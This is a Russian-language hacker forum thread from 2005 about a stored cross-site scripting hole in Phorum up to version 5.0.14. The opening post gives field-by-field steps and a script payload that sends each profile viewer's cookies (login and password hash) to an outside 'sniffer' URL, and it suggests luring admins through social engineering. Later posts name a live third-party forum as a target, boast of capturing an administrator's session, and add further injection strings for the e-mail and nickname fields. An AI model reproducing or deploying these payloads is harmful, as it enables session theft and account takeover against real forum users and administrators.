XSS в Phorum<=5.0.14

Discussion in 'Уязвимости' started by tester2005, 16 Mar 2005.

  1. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    90
    Likes Received:
    2
    Reputations:
    0
    CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
    Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
    А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
    В поле Real Name вводим имя затем XSS, пример:
    Code:
    Вовочка<script>alert(document.cookie)</script>
    Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно:)
    Теперь как можно употребить на других,
    В поле Real Nаme вставим:
    Code:
    Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
    Или че то подобное, где URL это адрес снифера. :)
    Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
    Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)
    Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:)
    Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
     
  2. White Jordan

    White Jordan Guest

    Reputations:
    0
    Ну давай ссылку что нам гадать в чём проблема чтоли?
     
  3. White Jordan

    White Jordan Guest

    Reputations:
    0
    Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.
     
  4. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Я эту фишку уже как 2 недели назад просек.
    Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
    Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.
     
  5. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Если никто не против, на днях сделаю видео.
     
  6. White Jordan

    White Jordan Guest

    Reputations:
    0
    Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
     
  7. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Ну возьми этот к примеру: http://www.recipe.ru/forum/
     
  8. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    90
    Likes Received:
    2
    Reputations:
    0
    Вроде в поле "подписи" эту уязвимость я не заметил,
    ты о чем??

    а кто против?, античату да и всем наоборот лучше :)
     
  9. KEZ

    KEZ Guest

    Reputations:
    0
    Ну и форум... Что это за форум на котором можно ставить <script>
     
  10. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    90
    Likes Received:
    2
    Reputations:
    0
    бывает..;)

    эх, был бы выход куки подделать..
     
  11. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Извиняюсь, немного провтыкал. А штука там такя, проверки в подписи нет только когда смотришь профайл, при посте же, вводится проверка на <>, так что внедрение скрипта в подпись в данном случае не прокатит.
    Беру свои слова назад, без просмотра жертвой профайла ничего не выйдет.

    Кстати, в phorume присутствуют bb теги, эт. так, для размышлений.....
    А насчет видео, в принципе всё и так понятно, но если есть потребность......будет и предложение.
     
  12. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Прикинь, доснял видео, заархивировал, думаю загляну ещё раз в лог сниффа, а уменя там админ уже сидит, гы-гы, даже никакой СИ не понадобилось, просто пиши в строке подписи FUCKING USA!!! и все.
    Вобщем сплошной ЛОЛ.
     
  13. KEZ

    KEZ Guest

    Reputations:
    0
    В этом форуме есть ещё уязвимости xss
     
  14. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Давеча ковырялся в старенькой версии phorum, несмотря на старость её можно найти на просторах инета оч. легко, и наткнулся на такой баг. При анонимном ответе, в поле Your E-mail: вставляю
    Code:
     gates@microsoft.com"><script>alert('')</script>
    и пока кто-нить после меня не оставит сообщение, все ловят алерт.=)

    p.s. KEZ, где ты ещё нашел, не в bb ль тегах?
     
  15. White Jordan

    White Jordan Guest

    Reputations:
    0
    Короче просто дайте мне ссылку на форум Я там хочу баги найти.
     
  16. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Morph"><script>alert('Morph Forever')</script> это еще в поле ник проходит =)
    Тока я зайти не могу еще чтонить поищем ))
     
  17. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    А я письмо не получил ))
     
  18. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Все работает всем алерты раздал зашибись ))
    Дыра Большая одна одним словом
     
  19. White Jordan

    White Jordan Guest

    Reputations:
    0
    Млрф дай ссылку где ты это зделал.
     
  20. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    в поисковике найди я так нашел и не запоминал
    И Я не Млрф!!!!! :mad: :mad: :mad: